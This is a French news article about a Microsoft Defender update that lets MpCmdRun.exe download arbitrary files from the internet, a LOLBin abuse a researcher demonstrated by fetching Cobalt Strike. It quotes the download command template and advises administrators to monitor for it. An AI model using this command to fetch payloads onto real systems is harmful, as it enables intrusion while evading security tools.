Une mise à jour récente de Microsoft Defender aurait créé une vulnérabilité inquiétante au sein du logiciel antivirus attitré de Windows 10. Celui-ci pourrait ainsi être exploité pour télécharger des fichiers malveillants en ligne.
Selon le testeur Mohammad Askar, quelques modifications apportées sur les lignes de commande de Microsoft Defender permettraient aux hackers d'utiliser le logiciel comme un script malveillant - sous l’architecture LOLBin. De nombreux LOLBins sont présents sous Windows 10, ils remplissent tous une fonction légitime. Cependant, avec les bons privilèges, les pirates informatiques peuvent abuser de ces fichiers binaires pour contourner les installations de sécurité et mener des attaques sans que la victime ne soit alertée.
- Meilleurs antivirus 2020 : quelle solution gratuite, premium ou business choisir ?
- En complément de votre antivirus, optez pour les meilleurs VPN | VPN Jeux en ligne | VPN Télétravail | VPN gratuits
- Comment arrêter une mise à jour Windows 10 ?
Une méthode assez basique
Comme l'a indiqué Askar, l'outil de ligne de commande de Microsoft Defender prend désormais en charge une nouvelle fonction « -DownloadFile ». Nous pensons que ce changement a pris effet avec la version 4.18.2007.9 ou 4.18.2009.9 de Microsoft Defender.
En conséquence, un hacker s’infiltrant sur un réseau local pourrait utiliser l'utilitaire de ligne de commande du service anti-malware de Microsoft pour télécharger un fichier sur Internet. Ce, avec la commande suivante : « MpCmdRun.exe -DownloadFile -url <url> -path <local-path> ».
En usant de cette technique, M. Askar a pu télécharger à distance le malware Cobalt Strike, directement via Microsoft Defender.
Bien que Defender détecte et atténue tout fichier malveillant transitant par cette technique, il n'est pas certain que d'autres services antivirus populaires se révèlent en mesure de se défendre contre ce type d'attaque… dans les cas où les protections natives ont été désactivées.
Il est conseillé aux administrateurs système de mettre à jour leurs listes de surveillance pour y inclure le nouveau LOLBin, afin de s'assurer que celui-ci ne soit pas utilisé pour concevoir une attaque de grande ampleur.
